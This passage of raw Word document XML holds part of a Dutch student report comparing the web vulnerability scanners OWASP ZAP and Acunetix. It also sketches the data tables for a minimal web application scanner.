        <w:t xml:space="preserve">, maar ik zal er wat verder op in gaan in dit deel. Fundamenteel is ZAP een interceptie proxy tool, het staat tussen de eindgebruiker en webbrowser. De </w:t>
      </w:r>
      <w:r w:rsidR="00D31B78">
        <w:t>DAS</w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w: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w:t>
      </w:r>
      <w:r w:rsidR="006D0550">
        <w:t>t er al een proxy in gebruik zijn</w:t>
      </w:r>
      <w:r>
        <w:t>, vele bedrijven hebben dit, dan kan Zap verbinding maken met de gebruikte proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509ECBC" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="434BFD77" w14:textId="07A10165" w:rsidR="006C1447" w:rsidRDefault="00394B19" w:rsidP="006C1447">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252161024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30DB2276" wp14:editId="573ABDD5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2997774</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="493" name="Rectangle 49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48FBC" id="Rectangle 493" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-236pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006C1447">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>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70528241" w:rsidR="006C390F" w:rsidRDefault="00294937" w:rsidP="006C1447">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293D12F" w14:textId="2D614501" w:rsidR="006241E9" w:rsidRDefault="006241E9" w:rsidP="00554FF4"/>
    <w:p w14:paraId="674016C3" w14:textId="4DABD8A2" w:rsidR="00554FF4" w:rsidRPr="00D36ED8" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36ED8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ZAP client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56049D18" w14:textId="1C7EDF23" w:rsidR="003C5FA0" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">ZAP biedt voor alle grote besturingssysteemplatformen een versie en is gemaakt voor zowel experts op gebied van cyber security </w:t>
      </w:r>
      <w:r w:rsidR="00F64EE1">
        <w:t>en beginners. Zap biedt ook veel</w:t>
      </w:r>
      <w:r w:rsidR="007A49A9">
        <w:t xml:space="preserve"> add-ons voor de ZAP DAS-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tool, deze zijn te vinden op de </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>ZAP-marktplaats</w:t>
      </w:r>
      <w:r>
        <w:t>. ZAP wordt onderhouden door een grote gemeenschap die onderhoud verrichten en geregeld nieuwe add-ons (toevoegingen van features) ontwikkelen e</w:t>
      </w:r>
      <w:r w:rsidR="008E277C">
        <w:t>n publiceren op de marktplaats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCA72C" w14:textId="3E77680F"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w:t>
      </w:r>
      <w:r w:rsidR="003F19AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>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8034245" w:rsidR="003C5FA0" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00DD3B62">
        <w:t>ssief te scannen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B636F8" w14:textId="240BE6F9"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w:t>
      </w:r>
      <w:r w:rsidR="00A85E17">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00876EAD">
        <w:t>top tien lijst behandeld.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ACF7EA" w14:textId="77777777" w:rsidR="0014570A" w:rsidRDefault="0014570A" w:rsidP="00554FF4"/>
    <w:p w14:paraId="40CE2017" w14:textId="77777777" w:rsidR="00BA2E92" w:rsidRDefault="00BA2E92" w:rsidP="00554FF4"/>
    <w:p w14:paraId="143DD9D5" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="610B7DC0" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="10E425E4" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="1B8E47F7" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="3C6B81AF" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00554FF4"/>
    <w:p w14:paraId="5E724DA0" w14:textId="77777777" w:rsidR="001545B1" w:rsidRDefault="001545B1" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A9D875" w14:textId="66703F76" w:rsidR="00180F10" w:rsidRPr="0014570A" w:rsidRDefault="00394B19" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252163072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CC16CE6" wp14:editId="4D5E0189">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3301436</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="494" name="Rectangle 49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55ABE" id="Rectangle 494" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-259.9pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0014570A" w:rsidRPr="0014570A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Test omgeving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096792CD" w14:textId="025B5C3F"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38">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9875"/>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9875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="002A05E5" w:rsidRPr="00641B06" w:rsidRDefault="002A05E5" w:rsidP="007042EB">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur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1" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:57.9pt;margin-top:220.25pt;width:297.05pt;height:21.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="002A05E5" w:rsidRPr="00641B06" w:rsidRDefault="002A05E5" w:rsidP="007042EB">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.6</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w:t>
      </w:r>
      <w:r w:rsidR="008F327C">
        <w:t>de webserver</w:t>
      </w:r>
      <w:r w:rsidR="009433B7">
        <w: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0AD4D2B0" w:rsidR="007042EB" w:rsidRDefault="007042EB" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210616C3" w14:textId="075E7BD8" w:rsidR="00E93607" w:rsidRDefault="00E93607" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D5A28D" w14:textId="1E43735E" w:rsidR="00BA7602" w:rsidRDefault="00BA3D1E" w:rsidP="00BA3D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="003E572F" w:rsidRPr="003E572F">
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BFFD4" w14:textId="51D7900C"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515EFC9D" w:rsidR="002A05E5" w:rsidRPr="004749D1" w:rsidRDefault="002A05E5" w:rsidP="007B5B71">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure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2"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P63joCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EWEt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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="729DC7E2" w14:textId="515EFC9D" w:rsidR="002A05E5" w:rsidRPr="004749D1" w:rsidRDefault="002A05E5" w:rsidP="007B5B71">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.7</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9">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2D745B">
        <w:t>DAS-</w:t>
      </w:r>
      <w:r w:rsidR="00EF5405">
        <w:t xml:space="preserve">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3166BF">
        <w:t>Waar de beide DAS-</w:t>
      </w:r>
      <w:r w:rsidR="0093267A">
        <w:t xml:space="preserve">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440DEA2D"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p>
    <w:p w14:paraId="1E4C0A21" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="662D68F4" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="77205817" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="2EE0696F" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="7239A38F" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="284495CB" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C"/>
    <w:p w14:paraId="69E62F6E" w14:textId="0988F308" w:rsidR="00071021" w:rsidRDefault="00394B19">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252165120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2330578A" wp14:editId="2A6DBB9D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898878</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3300942</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="495" name="Rectangle 49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F0184" id="Rectangle 495" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.8pt;margin-top:-259.85pt;width:25pt;height:1031.7pt;z-index:-2511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2OJ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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F321B8">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1DE9CE4C" w:rsidR="002A05E5" w:rsidRPr="00B2596E" w:rsidRDefault="002A05E5" w:rsidP="00F321B8">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 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3"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H20D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B0PnS9h/JMZCD04+Sd3DRU/kH48CyQ5oeapJ0IT3RUGtqCw8XirAb8&#10;8Td/zCdZKcpZS/NYcP/9KFBxpr9aEjwO72DgYOwHwx7NGqjxCW2bk8mkBxj0YFYI5oVWZRWrUEhY&#10;SbUKHgZzHfqtoFWTarVKSTSiToQHu3UyQg8077oXge4iUiB5H2GYVJG/0arPTWq51TEQ8UnISGzP&#10;Ig1AvNB4p1G4rGLcn1/vKev1D2P5Ew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ah9tA4AgAAeAQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM/+Wg7hAAAACAEAAA8AAAAA&#10;AAAAAAAAAAAAkAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B992CF2" w14:textId="1DE9CE4C" w:rsidR="002A05E5" w:rsidRPr="00B2596E" w:rsidRDefault="002A05E5" w:rsidP="00F321B8">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.8</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420619D8" w:rsidR="007E23B2" w:rsidRDefault="00247236">
      <w:r>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Waa</w:t>
      </w:r>
      <w:r w:rsidR="0088518E">
        <w:t>r Acunetix</w:t>
      </w:r>
      <w:r w:rsidR="001E0BD9">
        <w:t xml:space="preserve"> aan 4 tabellen</w:t>
      </w:r>
      <w:r w:rsidR="00B9609D">
        <w:t xml:space="preserve"> genoeg</w:t>
      </w:r>
      <w:r w:rsidR="001E0BD9">
        <w:t xml:space="preserve"> heeft</w:t>
      </w:r>
      <w:r w:rsidR="00B9609D">
        <w:t xml:space="preserve"> om er nuttige informatie van te maken, gebruikt OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00C73B63">
        <w:t>6 tabellen</w:t>
      </w:r>
      <w:r w:rsidR="00374BD8">
        <w:t>. Omdat ik een MVP maak is het van belang dat ik alleen essenti</w:t>
      </w:r>
      <w:r w:rsidR="004730E1">
        <w:t>ële data ver</w:t>
      </w:r>
      <w:r w:rsidR="00E41D80">
        <w:t>zamel en het niet te druk maak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D5519B" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRPr="005339D9" w:rsidRDefault="00191B6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005339D9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Datastructuur voor een MVP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B888C1" w14:textId="5CFBEFA1" w:rsidR="00256FA3" w:rsidRDefault="00792327">
      <w:r>
        <w:t>Een MVP heeft informatie nodig ov</w:t>
      </w:r>
      <w:r w:rsidR="000C308D">
        <w:t xml:space="preserve">er de volgende vijf onderwerpen, als je er één zou weghalen dan kun je geen </w:t>
      </w:r>
      <w:r w:rsidR="0071423F">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="000C308D">
        <w:t xml:space="preserve"> bouwen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3B174" w14:textId="2B888D02" w:rsidR="007F1D35" w:rsidRDefault="00FF5975" w:rsidP="009C0970">
      <w:r>
        <w:t>De tabellen</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="87" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="000318EF" w14:paraId="79426709" w14:textId="77777777" w:rsidTr="00083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A1EE5E" w14:textId="7ABC87DD" w:rsidR="00DB141A" w:rsidRDefault="00DB141A" w:rsidP="001A61C4">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="20DF33FD" w14:textId="77777777" w:rsidTr="000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377AAC7" w14:textId="0D78797E" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="297E246B" w14:textId="77777777" w:rsidTr="000837C4">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDA4462" w14:textId="61D982AE" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6910" w:tblpY="-792"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="0EEE47C3"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CCE15B" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="511B563B" w14:textId="77777777" w:rsidTr="00C1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643C64D" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Key (Sleutel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="3418C0BD" w14:textId="77777777" w:rsidTr="00C179DA">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C8029B" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Value (waarde)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6910" w:tblpY="296"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="16826702" w14:textId="77777777" w:rsidTr="008C2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A6B535" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="27838F58" w14:textId="77777777" w:rsidTr="008C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3B66669" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Module naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="247E64DC" w14:textId="77777777" w:rsidTr="008C2629">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D1EDFD8" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="55313D35" w14:textId="77777777" w:rsidTr="008C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FEFFFB3" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="4BA82967" w14:textId="77777777" w:rsidTr="008C2629">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D060985" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D8D540" w14:textId="77777777" w:rsidR="001A61C4" w:rsidRDefault="001A61C4" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="-13"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="76C52102"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B37CD21" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="513A6397" w14:textId="77777777" w:rsidTr="00C1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3904882" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t xml:space="preserve">Methode </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="7A40A965" w14:textId="77777777" w:rsidTr="00C179DA">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480B72D1" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E75B8E5" w14:textId="77777777" w:rsidR="000318EF" w:rsidRDefault="000318EF" w:rsidP="001A61C4"/>
    <w:p w14:paraId="6054A0AA" w14:textId="77777777" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="279"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="12327C0B"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F0732BE" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="22843299" w14:textId="77777777" w:rsidTr="00C179D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528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35CD5D61" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="44FFE911" w14:textId="77777777" w:rsidTr="00C179DA">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4495E1B0" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Bestand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426797B8" w14:textId="77777777" w:rsidR="002748C4" w:rsidRDefault="002748C4" w:rsidP="002748C4"/>
    <w:p w14:paraId="2255C08D" w14:textId="77777777" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4"/>
    <w:p w14:paraId="065289AC" w14:textId="584A7334" w:rsidR="008A79F1" w:rsidRPr="00035572" w:rsidRDefault="008A79F1">
      <w:r w:rsidRPr="003E572F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
